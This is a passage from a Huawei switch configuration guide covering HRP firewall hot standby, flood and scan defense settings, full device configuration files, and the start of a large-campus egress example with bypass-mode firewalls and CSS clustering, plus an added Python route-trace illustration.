# On FW1, associate VGMP groups with uplink and downlink interfaces.
[FW1] hrp track interface gigabitethernet 1/0/1 //Associate a VGMP group with
an uplink interface.
[FW1] hrp track interface eth-trunk 10 //Associate a VGMP group with a
downlink interface.

# On FW1, adjust the OSPF cost based on the HRP status.
[FW1] hrp adjust ospf-cost enable

# On FW2, associate VGMP groups with uplink and downlink interfaces.
[FW2] hrp track interface gigabitethernet 1/0/1 //Associate a VGMP group with
an uplink interface.
[FW2] hrp track interface eth-trunk 20 //Associate a VGMP group with a
downlink interface.

# On FW2, adjust the OSPF cost based on the HRP status.
[FW2] hrp adjust ospf-cost enable

# On FW1, specify a heartbeat interface and enable HRP.
[FW1] hrp interface gigabitethernet 1/0/7 remote 10.10.1.2 //Configure a
heartbeat interface and enable HRP.
[FW1] hrp enable //Enable HRP.
HRP_M[FW1] hrp mirror session enable //Enable quick session backup. In HRP
networking, if packets are received and sent along different paths, the quick
session backup function ensures that session information on the active firewall
is immediately synchronized to the standby firewall. When the active firewall
fails, packets can be forwarded by the standby firewall. This function ensures
nonstop sessions of internal and external users.

NOTE

After HRP is configured, the configuration and session of the active device are automatically backed up to the
standby device.

# On FW2, specify a heartbeat interface and enable HRP.
[FW2] hrp interface gigabitethernet 1/0/7 remote 10.10.1.1 //Configure a
heartbeat interface and enable HRP.
[FW2] hrp enable //Enable HRP.
HRP_B[FW2] hrp mirror session enable //Enable quick session backup. In HRP
networking, if packets are received and sent along different paths, the quick
session backup function ensures that session information on the active firewall
is immediately synchronized to the standby firewall. When the active firewall
fails, packets can be forwarded by the standby firewall. This function ensures
nonstop sessions of internal and external users.

# Verify the configuration.


HRP_M[FW1] display hrp state
Role: active, peer: active
Running priority: 49012, peer: 49012
Core state: normal, peer: normal
Backup channel usage: 3%
Stable time: 0 days, 5 hours, 1 minutes

The local and remote firewalls have the same priority and are both in active state, indicating
that the two firewalls are in load balancing state.
Step 10 Configure attack defense on firewalls.
To protect internal servers against potential SYN Flood attacks and HTTP Flood attacks,
enable defense against SYN Flood attacks and HTTP Flood attacks on firewalls.

NOTE

The attack defense threshold is used for reference. Set this value according to actual network traffic.
HRP_M[FW1] firewall defend syn-flood enable
HRP_M[FW1] firewall defend syn-flood zone untrust max-rate 20000
HRP_M[FW1] firewall defend udp-flood enable
HRP_M[FW1] firewall defend udp-flood zone untrust max-rate 1500
HRP_M[FW1] firewall defend icmp-flood enable
HRP_M[FW1] firewall defend icmp-flood zone untrust max-rate 20000
HRP_M[FW1] firewall blacklist enable
HRP_M[FW1] firewall defend ip-sweep enable
HRP_M[FW1] firewall defend ip-sweep max-rate 4000
HRP_M[FW1] firewall defend port-scan enable
HRP_M[FW1] firewall defend port-scan max-rate 4000
HRP_M[FW1] firewall defend ip-fragment enable
HRP_M[FW1] firewall defend ip-spoofing enable

----End

Configuration Files
l Configuration file of Router1
#
sysname Router1
#
acl number 2000
rule permit source 192.168.1.0 0.0.0.255
#
nat address-group 1 202.10.1.3 202.10.1.9
#
interface GigabitEthernet 0/0/1
ip address 10.1.1.1 255.255.255.0
#
interface GigabitEthernet 0/0/2
ip address 202.10.1.1 255.255.255.0
nat outbound 2000 address-group 1
nat server protocol tcp global 202.10.1.10 http inside 10.100.1.10 http
#
interface LoopBack0
ip address 1.1.1.1 255.255.255.255
#
ospf 1 router id 1.1.1.1
area 0.0.0.0
network 10.1.1.0 0.0.0.255
#
ip route-static 0.0.0.0 0.0.0.0 202.10.1.2
#
return

l Configuration file of Router2
#
sysname Router2
#
acl number 2000
rule permit source 192.168.1.0 0.0.0.255
#
nat address-group 1 202.10.2.3 202.10.2.10 mask 255.255.255.0
#
interface GigabitEthernet 0/0/1
ip address 10.2.1.1 255.255.255.0
#
interface GigabitEthernet 0/0/2
ip address 202.10.2.1 255.255.255.0
nat outbound 2000 address-group 1
nat server protocol tcp global 202.10.1.10 http inside 10.100.1.10 http
#
interface LoopBack0
ip address 2.2.2.2 255.255.255.255
#
ospf 1 router id 2.2.2.2
area 0.0.0.0
network 10.2.1.0 0.0.0.255
#
ip route-static 0.0.0.0 0.0.0.0 202.10.2.2
#
return

l Configuration file of FW1
#
sysname FW1
#
router id 3.3.3.3
#
hrp mirror session enable
hrp adjust ospf-cost enable
hrp enable
hrp interface GigabitEthernet 1/0/7 remote 10.10.1.2
hrp track interface GigabitEthernet1/0/1
hrp track interface Eth-Trunk 10
#
interface Eth-Trunk 10
ip address 10.3.1.1 255.255.255.0
#
interface GigabitEthernet 1/0/1
ip address 10.1.1.2 255.255.255.0
#
interface GigabitEthernet 1/0/7
ip address 10.10.1.1 255.255.255.0
#
interface GigabitEthernet 2/0/3
eth-trunk 10
#
interface GigabitEthernet 2/0/4
eth-trunk 10
#
interface LoopBack0
ip address 3.3.3.3 255.255.255.255
#
firewall zone trust
set priority 85
add interface Eth-Trunk10
#
firewall zone dmz
set priority 50
add interface GigabitEthernet1/0/7
#
firewall zone untrust
set priority 5
add interface GigabitEthernet 1/0/1
#

ospf

Issue 10 (2016-10-30) Huawei Proprietary and Confidential 48


Copyright © Huawei Technologies Co., Ltd.
S12700 Series Agile Switches
Typical Configuration Examples 2 Comprehensive configuration example

1
area 0.0.0.0
network 10.1.1.0 0.0.0.255
network 10.3.1.0 0.0.0.255
#
ip route-static 0.0.0.0 0.0.0.0 10.1.1.1
#
policy interzone local trust outbound
policy 1
action permit
policy source 10.3.1.0 mask 24
policy source 10.5.1.0 mask 24
policy source 192.168.1.0 mask 24
#
policy interzone local untrust inbound
policy 2
action permit
policy source 10.1.1.0 mask 24
#
policy interzone trust untrust inbound
policy 3
action permit
policy source 10.1.1.0 mask 24
#
policy interzone trust untrust outbound
policy 4
action permit
policy source 192.168.1.0 mask 24
#
firewall defend syn-flood enable
firewall defend syn-flood zone untrust max-rate 20000
firewall defend udp-flood enable
firewall defend udp-flood zone untrust max-rate 1500
firewall defend icmp-flood enable
firewall defend icmp-flood zone untrust max-rate 20000
firewall blacklist enable
firewall defend ip-sweep enable
firewall defend ip-sweep max-rate 4000
firewall defend port-scan enable
firewall defend port-scan max-rate 4000
firewall defend ip-fragment enable
firewall defend ip-spoofing enable
#
return

l Configuration file of FW2
#
sysname FW2
#
router id 4.4.4.4
#
hrp mirror session enable
hrp adjust ospf-cost enable
hrp enable
hrp interface GigabitEthernet 1/0/7 remote 10.10.1.1
hrp track interface GigabitEthernet1/0/1
hrp track interface Eth-Trunk 20
#
interface Eth-Trunk 20
ip address 10.4.1.1 255.255.255.0
#
interface GigabitEthernet 1/0/1
ip address 10.2.1.2 255.255.255.0
#
interface GigabitEthernet 1/0/7
ip address 10.10.1.2 255.255.255.0
#
interface GigabitEthernet 2/0/3
eth-trunk 20
#
interface GigabitEthernet 2/0/4
eth-trunk 20
#
interface LoopBack0
ip address 4.4.4.4 255.255.255.255
#
firewall zone trust
set priority 85
add interface Eth-Trunk20
#
firewall zone dmz
set priority 50
add interface GigabitEthernet1/0/7
#
firewall zone untrust
set priority 5
add interface GigabitEthernet 1/0/1
#
ospf 1
area 0.0.0.0
network 10.2.1.0 0.0.0.255
network 10.4.1.0 0.0.0.255
#
ip route-static 0.0.0.0 0.0.0.0 10.2.1.1
#
policy interzone local trust outbound
policy 1
action permit
policy source 10.4.1.0 mask 24
policy source 10.6.1.0 mask 24
policy source 192.168.2.0 mask 24
#
policy interzone local untrust inbound
policy 2
action permit
policy source 10.2.1.0 mask 24
#
policy interzone trust untrust inbound
policy 3
action permit
policy source 10.2.1.0 mask 24
#
firewall defend syn-flood enable
firewall defend syn-flood zone untrust max-rate 20000
firewall defend udp-flood enable
firewall defend udp-flood zone untrust max-rate 1500
firewall defend icmp-flood enable
firewall defend icmp-flood zone untrust max-rate 20000
firewall blacklist enable
firewall defend ip-sweep enable
firewall defend ip-sweep max-rate 4000
firewall defend port-scan enable
firewall defend port-scan max-rate 4000
firewall defend ip-fragment enable
firewall defend ip-spoofing enable
#
return

l Configuration file of the CSS
#
sysname CSS
#
vlan batch 100 200 300
#
dhcp enable
#
ip pool poola
gateway-list 192.168.1.1
network 192.168.1.0 mask 255.255.255.0
#
ip pool poolb
gateway-list 192.168.2.1
network 192.168.2.0 mask 255.255.255.0
#
interface Vlanif 100
ip address 10.5.1.1 255.255.255.0
dhcp select global
#
interface Vlanif 200
ip address 10.6.1.1 255.255.255.0
dhcp select global
#
interface Vlanif 300
ip address 10.100.1.100 255.255.255.0
#
interface Eth-Trunk 10
undo portswitch
ip address 10.3.1.2 255.255.255.0
#
interface Eth-Trunk 20
undo portswitch
ip address 10.4.1.2 255.255.255.0
#
interface Eth-Trunk 100
port link-type hybrid
port hybrid pvid vlan 100
port hybrid untagged vlan 100
#
interface Eth-Trunk 200
port link-type hybrid
port hybrid pvid vlan 200
port hybrid untagged vlan 200
#
interface GigabitEthernet 1/1/0/1
port link-type access
port default vlan 300
#
interface GigabitEthernet 1/1/0/3
eth-trunk 10
#
interface GigabitEthernet 1/1/0/4
eth-trunk 20
#
interface GigabitEthernet 1/2/0/3
eth-trunk 100
#
interface GigabitEthernet 1/2/0/4
eth-trunk 200
#
interface GigabitEthernet 2/1/0/3
eth-trunk 10
#
interface GigabitEthernet 2/1/0/4
eth-trunk 20
#
interface GigabitEthernet 2/2/0/3
eth-trunk 100
#
interface GigabitEthernet 2/2/0/4
eth-trunk 200
#
interface LoopBack0
ip address 5.5.5.5 255.255.255.255
#
ospf 1 router-id 5.5.5.5
area 0.0.0.0
network 10.3.1.0 0.0.0.255
network 10.4.1.0 0.0.0.255
network 10.100.1.0 0.0.0.255
area 0.0.0.1
network 10.5.1.0 0.0.0.255
area 0.0.0.2
network 10.6.1.0 0.0.0.255
#
ip route-static 0.0.0.0 0.0.0.0 10.3.1.1
ip route-static 0.0.0.0 0.0.0.0 10.4.1.1
#
return

l Configuration file of AGG1
#
sysname AGG1
#
vlan batch 100 500
#
interface Vlanif 100
ip address 10.5.1.2 255.255.255.0
#
interface Vlanif 500
ip address 192.168.1.1 255.255.255.0
dhcp select relay
dhcp relay server-ip 10.5.1.1
#
interface Eth-Trunk 100
port link-type hybrid
port hybrid pvid vlan 100
port hybrid untagged vlan 100
#
interface Eth-Trunk 500
port link-type hybrid
port hybrid pvid vlan 500
port hybrid untagged vlan 500
#
interface GigabitEthernet 1/0/1
eth-trunk 100
#
interface GigabitEthernet 2/0/1
eth-trunk 100
#
interface GigabitEthernet 1/0/5
eth-trunk 500
#
interface GigabitEthernet 2/0/5
eth-trunk 500
#
interface LoopBack0
ip address 6.6.6.6 255.255.255.255
#
ospf 1 router-id 6.6.6.6
area 0.0.0.1
network 10.5.1.0 0.0.0.255
network 192.168.1.0 0.0.0.255
nssa
#
return

l Configuration file of AGG2
#
sysname AGG2
#
vlan batch 200 600
#
interface Vlanif 200
ip address 10.6.1.2 255.255.255.0
#
interface Vlanif 600
ip address 192.168.2.1 255.255.255.0
dhcp select relay
dhcp relay server-ip 10.6.1.1
#
interface Eth-Trunk 200
port link-type hybrid
port hybrid pvid vlan 200
port hybrid untagged vlan 200
#
interface Eth-Trunk 600
port link-type hybrid
port hybrid pvid vlan 600
port hybrid untagged vlan 600
#
interface GigabitEthernet 1/0/1
eth-trunk 200
#
interface GigabitEthernet 2/0/1
eth-trunk 200
#
interface GigabitEthernet 1/0/5
eth-trunk 600
#
interface GigabitEthernet 2/0/5
eth-trunk 600
#
interface LoopBack0
ip address 7.7.7.7 255.255.255.255
#
ospf 1 router-id 7.7.7.7
area 0.0.0.2
network 10.6.1.0 0.0.0.255
network 192.168.2.0 0.0.0.255
nssa
#
return

2.3 Example for Configuring the Egress of a Large-scale Campus (Firewalls Are Connected to Core Switches in Bypass Mode)

Configuration Notes
l This example uses Huawei S series modular switches, USG firewalls, and NE routers to
describe the configuration procedure.
l The configuration procedure in this example involves only the enterprise network egress.
For the internal network configuration, see "Large-Sized Campus Networks" in the
Huawei S Series Campus Switch Quick Configuration Guide.


l Only the connection configurations between firewalls and switches and the HRP
configurations on firewalls are provided in the following procedure. For the security
service plan on the firewalls and security policies, attack defense, bandwidth
management, and IPSec on the campus network, see Firewall Configuration Examples.
l This example describes only the routers and switches at the egress of campus network.
For the Internet-side configurations on routers, see the NE Router Configuration Guide.

Networking Requirements
At the egress of a large-sized campus network, core switches connect to routers to access the
Internet through upstream interfaces. Firewalls connect to the core switches in bypass mode to
filter service traffic.
To simplify the network and improve reliability, a switch cluster is deployed at the core layer.
HRP (active/standby mode) is deployed on the firewalls. If one firewall fails, services are
switched to the other firewall.
Each of the core switches is dual homed to two egress routers, and VRRP is configured
between routers to ensure reliability.
To improve link reliability, Eth-Trunks are configured between core switches and egress
routers, core switches and firewalls, and two firewalls.
The networking diagram is as follows.


Figure 2-6 Networking diagram at the campus egress (HRP firewalls in bypass mode)
[Figure omitted: Internet, Router 1 and Router 2 running VRRP VRID 1, the CSS with FW 1 and
FW 2 attached in bypass mode and running HRP, two aggregation switches, and service networks 1
and 2. Traffic from the intranet to the Internet and from the Internet to the intranet is
shown as two separate paths.]

In Layer 3 forwarding environment, traffic inside and outside the campus network is directly
forwarded by switches, but does not pass through FW1 and FW2. When traffic needs to be
forwarded to FWs for filtering through switches, the VRF function must be configured on
switches. The CSS is divided into a virtual switch VRF-A and a root switch Public, which are
separated from each other.
Public is connected to the egress routers, and forwards traffic from the Internet to FWs for
filtering and traffic from FWs to the egress routers.
VRF-A is connected to the intranet, and forwards traffic from FWs to the intranet and traffic
from intranet to FWs for filtering.
The following logical network diagram shows the traffic forwarding paths.


Figure 2-7 Connections between physical interfaces of switches, routers, and firewalls
[Figure omitted: physical cabling between Router 1, Router 2, the CSS (Switch 1 master,
Switch 2 backup, split into the Internet-side Public and the intranet-side VRF-A), FW 1, FW 2
and the aggregation switches. The member interfaces of each Eth-Trunk shown in the figure are
listed in Table 2-4.]


In this example, the core switches work in Layer 3 mode. The firewalls connect to Layer 3
switches through upstream and downstream interfaces. VRRP needs to be configured on both
upstream and downstream service interfaces of firewalls, as shown below.


Figure 2-8 Connections between Layer 3 interfaces of switches, routers, and firewalls
[Figure omitted: Layer 3 topology with the interface addresses, the VRRP virtual IP addresses
(routers: 10.10.4.100/24; firewalls upstream VRID 1: 10.10.2.5/24; firewalls downstream
VRID 2: 10.10.3.5/24), OSPF area 0 between the routers and Public, and the numbered static
routes on Public, VRF-A and the firewalls. The addresses are listed in Table 2-4 and the
forwarding paths are described below.]


The traffic (in blue) from the intranet to the Internet is forwarded as follows:
1. When traffic from the intranet to the Internet reaches VRF-A, it is then forwarded to the
firewalls based on the static route (next hop is the downstream VRRP virtual IP address
of firewalls) configured on VRF-A.
2. After filtering the traffic, the firewalls forward traffic to Public based on the static route
(next hop is the CSS's VLANIF 20).
3. Public forwards traffic to routers based on the static route (next hop is the router VRRP
virtual IP address).
The traffic (in red) from the Internet to the intranet is forwarded as follows:
1. The traffic from the Internet to the intranet reaches the routers, and is then forwarded to
Public based on the OSPF routing table.
2. Public forwards the traffic to firewalls based on the static route (next hop is the upstream
VRRP virtual IP address of firewalls).
3. After filtering the traffic, the firewalls forward traffic to VRF-A based on the static route
(next hop is the CSS's VLANIF 30).
4. VRF-A forwards the traffic to aggregation switches based on the OSPF routing table, and
then the aggregation switches forward the traffic to service networks.
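Both paths above exist only because the route tables steer traffic through the firewalls; a bypass-mode firewall inspects nothing the switch does not send it. The following added example (not Huawei's code) builds the tables of Figure 2-8 as longest-prefix-match routing instances, traces both directions, and contrasts a CSS without the VRF split. It assumes the intranet-bound static routes on Public and on the firewalls cover the service-network prefixes 10.10.100.0/24 and 10.10.200.0/24, and that FW1 holds both VRRP virtual addresses.

```python
"""Route trace for the bypass-mode firewall design (added example)."""
from ipaddress import ip_address, ip_network

INTERNET = "Internet"  # sink: a route whose next hop is INTERNET leaves the campus


def node(connected, routes):
    """One routing instance: its connected prefixes and (prefix, next hop) routes."""
    return {"connected": [ip_network(p) for p in connected],
            "routes": [(ip_network(p), nh) for p, nh in routes]}


# Routing instances of the bypass-mode design (addresses from Figure 2-8).
# The /24 service-network routes are an assumption; the text only says "static route".
BYPASS_DESIGN = {
    "VRF-A": node(["10.10.3.0/24", "10.10.100.0/24", "10.10.200.0/24"],
                  [("0.0.0.0/0", "10.10.3.5")]),             # downstream VRRP VIP
    "FW1": node(["10.10.2.0/24", "10.10.3.0/24"],
                [("0.0.0.0/0", "10.10.2.1"),                 # VLANIF 20 on Public
                 ("10.10.100.0/24", "10.10.3.1"),            # VLANIF 30 on VRF-A
                 ("10.10.200.0/24", "10.10.3.1")]),
    "Public": node(["10.10.4.0/24", "10.10.2.0/24"],
                   [("0.0.0.0/0", "10.10.4.100"),            # router VRRP VIP
                    ("10.10.100.0/24", "10.10.2.5"),         # upstream VRRP VIP
                    ("10.10.200.0/24", "10.10.2.5")]),
    "Router1": node(["10.10.4.0/24"],
                    [("0.0.0.0/0", INTERNET),
                     ("10.10.100.0/24", "10.10.4.1"),        # learnt from the CSS via OSPF
                     ("10.10.200.0/24", "10.10.4.1")]),
}
# Which instance answers for each next-hop address; VRRP VIPs resolve to the master.
BYPASS_OWNERS = {"10.10.3.5": "FW1", "10.10.3.1": "VRF-A", "10.10.2.1": "Public",
                 "10.10.2.5": "FW1", "10.10.4.100": "Router1", "10.10.4.1": "Public"}

# Counter-example (constructed): the same CSS with one routing table, no VRF split.
FLAT_DESIGN = {
    "CSS": node(["10.10.4.0/24", "10.10.2.0/24", "10.10.3.0/24",
                 "10.10.100.0/24", "10.10.200.0/24"],
                [("0.0.0.0/0", "10.10.4.100")]),
    "FW1": BYPASS_DESIGN["FW1"],
    "Router1": BYPASS_DESIGN["Router1"],
}
FLAT_OWNERS = {"10.10.4.100": "Router1", "10.10.4.1": "CSS", "10.10.2.1": "CSS",
               "10.10.3.1": "CSS", "10.10.2.5": "FW1", "10.10.3.5": "FW1"}


def lookup(table, dst):
    """Longest-prefix match: a connected prefix delivers locally, otherwise the
    most specific route's next hop is returned; None means no route."""
    if any(dst in p for p in table["connected"]):
        return "connected"
    matches = [(p, nh) for p, nh in table["routes"] if dst in p]
    if not matches:
        return None
    return max(matches, key=lambda m: m[0].prefixlen)[1]


def trace(design, owners, start, dst_ip, max_hops=16):
    """List the routing instances a packet to dst_ip crosses, starting at start.
    The path ends at the instance that delivers it, at INTERNET, or at 'DROP'/'LOOP'."""
    dst, node_name, path = ip_address(dst_ip), start, []
    while node_name != INTERNET and len(path) < max_hops:
        path.append(node_name)
        nh = lookup(design[node_name], dst)
        if nh == "connected":
            return path
        if nh is None:
            return path + ["DROP"]
        node_name = INTERNET if nh == INTERNET else owners[nh]
    return path + [INTERNET] if node_name == INTERNET else path + ["LOOP"]


def inspected_by_firewall(path):
    """True when the traced path crosses the active firewall."""
    return "FW1" in path


if __name__ == "__main__":
    for name, design, owners, start in (("bypass", BYPASS_DESIGN, BYPASS_OWNERS, "VRF-A"),
                                        ("flat", FLAT_DESIGN, FLAT_OWNERS, "CSS")):
        up = trace(design, owners, start, "8.8.8.8")
        down = trace(design, owners, "Router1", "10.10.100.50")
        print(f"{name}: up {up} inspected={inspected_by_firewall(up)}")
        print(f"{name}: down {down} inspected={inspected_by_firewall(down)}")
```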

Data Plan

Table 2-4 Link aggregation data plan

Device | Interface | Member Interface | VLANIF Number | IP Address | Remote Device | Remote Interface
------ | --------- | ---------------- | ------------- | ---------- | ------------- | ----------------
Router1 | Eth-Trunk1.100 | 10GE1/0/1, 10GE1/0/2 | - | 10.10.4.2/24 | Switch 1, Switch 2 | Eth-Trunk1
Router2 | Eth-Trunk1.100 | 10GE1/0/1, 10GE1/0/2 | - | 10.10.4.3/24 | Switch 1, Switch 2 | Eth-Trunk2
VRRP of Router 1 and Router 2 | - | - | - | 10.10.4.100/24 | - | -
CSS (Switch 1 and Switch 2) | Eth-Trunk1 | 10GE1/4/0/0, 10GE2/4/0/0 | VLANIF10 | 10.10.4.1/24 | Router 1 | Eth-Trunk1
CSS (Switch 1 and Switch 2) | Eth-Trunk2 | 10GE1/4/0/1, 10GE2/4/0/1 | VLANIF10 | 10.10.4.1/24 | Router 2 | Eth-Trunk1
CSS (Switch 1 and Switch 2) | Eth-Trunk4 | GE1/1/0/7, GE2/1/0/7 | VLANIF20 | 10.10.2.1/24 | FW 1 | Eth-Trunk4
CSS (Switch 1 and Switch 2) | Eth-Trunk5 | GE1/1/0/8, GE2/1/0/8 | VLANIF30 | 10.10.3.1/24 | FW 1 | Eth-Trunk5
CSS (Switch 1 and Switch 2) | Eth-Trunk6 | GE1/2/0/7, GE2/2/0/7 | VLANIF20 | 10.10.2.1/24 | FW 2 | Eth-Trunk6
CSS (Switch 1 and Switch 2) | Eth-Trunk7 | GE1/2/0/8, GE2/2/0/8 | VLANIF30 | 10.10.3.1/24 | FW 2 | Eth-Trunk7
CSS (Switch 1 and Switch 2) | Eth-Trunk8 | GE1/3/0/1, GE2/3/0/1 | VLANIF100 | 10.10.100.1/24 | Service network 1 | - (omitted in this example)
CSS (Switch 1 and Switch 2) | Eth-Trunk9 | GE1/3/0/2, GE2/3/0/2 | VLANIF200 | 10.10.200.1/24 | Service network 2 | - (omitted in this example)
FW1 | Eth-Trunk1 | GE2/0/0, GE2/0/1 | - | 10.1.1.1/24 | FW2 | Eth-Trunk1
FW1 | Eth-Trunk4 | GE1/0/0, GE1/0/1 | - | 10.10.2.2/24 | Switch 1, Switch 2 | Eth-Trunk4
FW1 | Eth-Trunk5 | GE1/1/0, GE1/1/1 | - | 10.10.3.2/24 | Switch 1, Switch 2 | Eth-Trunk5
FW2 | Eth-Trunk1 | GE2/0/0, GE2/0/1 | - | 10.1.1.2/24 | FW1 | Eth-Trunk1
FW2 | Eth-Trunk6 | GE1/0/0, GE1/0/1 | - | 10.10.2.3/24 | Switch 1, Switch 2 | Eth-Trunk6
FW2 | Eth-Trunk7 | GE1/1/0, GE1/1/1 | - | 10.10.3.3/24 | Switch 1, Switch 2 | Eth-Trunk7
VRRP1 of FW 1 and FW 2 (upstream) | - | - | - | 10.10.2.5/24 | - | -
VRRP2 of FW 1 and FW 2 (downstream) | - | - | - | 10.10.3.5/24 | - | -

Configuration Roadmap
The configuration roadmap is as follows:

1. Configure the CSS for core switches.
2. Assign IP addresses to the interfaces between switches, firewalls, and routers.
To improve link reliability, configure inter-chassis Eth-Trunks between switches and
firewalls and between switches and routers.
Configure security zones on the firewalls' interfaces.
3. Configure VRRP on egress routers.
To ensure reliability between the core switches and two egress routers, deploy VRRP
between the two egress routers so that VRRP heartbeat packets are exchanged through
the core switches. Router1 functions as the master device, and Router2 functions as the
backup device.
4. Deploy routing.


Configure the VRF function on switches to divide the CSS into a virtual switch VRF-A
and a root switch Public, which separate the service network routes and public network
routes.
To steer the upstream traffic on each device, configure a default route on core switches,
of which the next hop is the VRRP virtual IP address of the egress routers.
To steer the return traffic of two egress routers, configure OSPF between the egress
routers and core switches, and advertise all user network segment routes on the core
switches into OSPF on egress routers.
To forward the upstream traffic of service networks to firewalls, configure a default route
on switches, of which the next hop is the virtual IP address of VRRP VRID2 on
firewalls.
To forward the downstream traffic of service network 1 to firewalls, configure a default
route on switches, of which the next hop is the virtual IP address of VRRP VRID1 on
firewalls.
To forward the downstream traffic of service network 2 to firewalls, configure a default
route on switches, of which the next hop is the virtual IP address of VRRP VRID1 on
firewalls.
To forward the upstream traffic of service networks to switches, configure a default route
on firewalls, of which the next hop is the IP address of VLANIF 20 on switches.
To forward the downstream traffic of service network 1 to switches, configure a default
route on firewalls, of which the next hop is the IP address of VLANIF 30 on switches.
To forward the downstream traffic of service network 2 to switches, configure a default
route on firewalls, of which the next hop is the IP address of VLANIF 30 on switches.
5. Configure HRP on firewalls.

Procedure
Step 1 On Switch 1 and Switch 2: Configure the CSS.
1. Connect CSS cards through cables.
In the following figure, the S12700 switches have the CSS cards EH1D2VS08000
installed. An S12700 has a maximum number of MPUs, SFUs, and CSS cards installed.
Each chassis must have at least one MPU and one SFU installed. You are advised to
install two SFUs and two CSS cards in each chassis.


Figure 2-9 CSS card connections

NOTE

– The two chassis are connected by at least one CSS cable.
– One CSS card can only be connected to one CSS card in the other chassis but not the local
chassis.
– An interface in group 1 of a CSS card can only be connected to any interface in group 1 of the
CSS card on the other chassis. The requirements for interfaces in group 2 are the same.
– CSS cards have the same number of cluster cables connected. (If the CSS cards have different
numbers of cluster cables connected, the total cluster bandwidth depends on the cluster with
the least cluster cables connected.) In addition, interfaces on CSS cards are connected based on
interface numbers.
2. Configure clustering on Switch 1.
# Set the cluster mode to CSS card (the default value does not need to be configured).
Retain the default cluster ID 1 (the default value does not need to be configured) and set
the priority to 100.
<HUAWEI> system-view
[HUAWEI] set css mode css-card //Default setting. You do not need to run
this command. The step is used for reference.
[HUAWEI] set css id 1 //Default setting. You do not need to run this
command. The step is used for reference.
[HUAWEI] set css priority 100 //The default CSS priority is 1. Change the
priority of the master switch to be higher than that of the backup switch.
[HUAWEI] css enable
Warning: The CSS configuration takes effect only after the system is
rebooted. The next CSS mode is CSS-card. Reboot now? [Y/N]:y //Restart the
switch.

3. Configure clustering on Switch 2.
Set the cluster mode to CSS card (the default value does not need to be configured). Set
the CSS ID to 2 and retain the default priority 1 (the default value does not need to be
configured).


<HUAWEI> system-view
[HUAWEI] set css id 2 //The default CSS ID is 1. Change the CSS ID to 2.
[HUAWEI] css enable
Warning: The CSS configuration takes effect only after the system is
rebooted. The next CSS mode is CSS-card. Reboot now? [Y/N]:y //Restart the
switch.

4. Check the CSS status after the switches restart.
– On Switch 1, the active switch of the CSS, the MASTER indicator on the active
MPU is steady green. (Figure 1)
– On Switch 1, the CSS ID indicators numbered 1 on both MPUs are steady green.
On Switch2, the CSS ID indicators numbered 2 on both MPUs are steady green.
(Figure 1)
– The LINK/ALM indicators of interfaces on all CSS cards connected to cluster
cables are steady green. (Figure 2)
– The MASTER indicators on all CSS cards in the active chassis are steady green,
and the MASTER indicators on all CSS cards in the standby chassis are off. (Figure
2)

Figure 2-10 Indicators of the MPU and CSS card

NOTE

– After the CSS is established, subsequent operations will be performed on the master switch
(switch 1) and data will be automatically synchronized to the standby switch (switch 2).
– The interface name in a CSS is in the format like 10GE1/4/0/0. The leftmost part indicates the
CSS ID.

Step 2 On switch 1: Configure the inter-chassis Eth-Trunks between CSS and FWs and between CSS
and routers. Configure VLANIF interfaces on the CSS and assign IP addresses to them.
1. Configure an inter-chassis Eth-Trunk between switches and routers. Configure VLANIF
interfaces and assign IP addresses to them.


# In the CSS, create Eth-Trunk1 to connect to Router1 and add member interfaces to
Eth-Trunk1.
<HUAWEI> system-view
[HUAWEI] sysname CSS //Rename the CSS.
[CSS] interface Eth-Trunk 1
[CSS-Eth-Trunk1] quit
[CSS] interface XGigabitethernet 1/4/0/0 //Add an interface on the master
switch to Eth-Trunk1.
[CSS-XGigabitEthernet1/4/0/0] Eth-Trunk 1
[CSS-XGigabitEthernet1/4/0/0] quit
[CSS] interface XGigabitethernet 2/4/0/0 //Add an interface on the backup
switch to Eth-Trunk1.
[CSS-XGigabitEthernet2/4/0/0] Eth-Trunk 1
[CSS-XGigabitEthernet2/4/0/0] quit

# In the CSS, create Eth-Trunk2 to connect to Router2 and add member interfaces to
Eth-Trunk2.
[CSS] interface Eth-Trunk 2
[CSS-Eth-Trunk2] quit
[CSS] interface XGigabitethernet 1/4/0/1 //Add an interface on the master
switch to Eth-Trunk2.
[CSS-XGigabitEthernet1/4/0/1] Eth-Trunk 2
[CSS-XGigabitEthernet1/4/0/1] quit
[CSS] interface XGigabitethernet 2/4/0/1 //Add an interface on the backup
switch to Eth-Trunk2.
[CSS-XGigabitEthernet2/4/0/1] Eth-Trunk 2
[CSS-XGigabitEthernet2/4/0/1] quit

# Create VLANIF interfaces and assign IP addresses to them.
[CSS] vlan batch 10
[CSS] interface Eth-Trunk 1 //Add Eth-Trunk1 to VLAN 10.
[CSS-Eth-Trunk1] port link-type trunk
[CSS-Eth-Trunk1] port trunk allow-pass vlan 10
[CSS-Eth-Trunk1] quit
[CSS] interface Eth-Trunk 2 //Add Eth-Trunk2 to VLAN 10.
[CSS-Eth-Trunk2] port link-type trunk
[CSS-Eth-Trunk2] port trunk allow-pass vlan 10
[CSS-Eth-Trunk2] quit
[CSS] interface Vlanif 10 //Create VLANIF 10 for the CSS to communicate
with Router1 and Router2.
[CSS-Vlanif10] ip address 10.10.4.1 24
[CSS-Vlanif10] quit

2. Configure the inter-chassis Eth-Trunks between the CSS and the FWs. Configure VLANIF
interfaces on the CSS and assign IP addresses to them.

# In the CSS, create Eth-Trunk4 to connect Public to FW1 and add member interfaces to
Eth-Trunk4.
[CSS] interface Eth-Trunk 4
[CSS-Eth-Trunk4] quit
[CSS] interface Gigabitethernet 1/1/0/7 //Add an interface on the master
switch to Eth-Trunk4.
[CSS-Gigabitethernet1/1/0/7] Eth-Trunk 4
[CSS-Gigabitethernet1/1/0/7] quit
[CSS] interface Gigabitethernet 2/1/0/7 //Add an interface on the backup
switch to Eth-Trunk4.
[CSS-Gigabitethernet2/1/0/7] Eth-Trunk 4
[CSS-Gigabitethernet2/1/0/7] quit

# In the CSS, create Eth-Trunk5 to connect VRF-A to FW1 and add member interfaces
to Eth-Trunk5.


[CSS] interface Eth-Trunk 5
[CSS-Eth-Trunk5] quit
[CSS] interface Gigabitethernet 1/1/0/8 //Add an interface on the master
switch to Eth-Trunk5.
[CSS-Gigabitethernet1/1/0/8] Eth-Trunk 5
[CSS-Gigabitethernet1/1/0/8] quit
[CSS] interface Gigabitethernet 2/1/0/8 //Add an interface on the backup
switch to Eth-Trunk5.
[CSS-Gigabitethernet2/1/0/8] Eth-Trunk 5
[CSS-Gigabitethernet2/1/0/8] quit

# In the CSS, create Eth-Trunk6 to connect Public to FW2 and add member interfaces to
Eth-Trunk6.
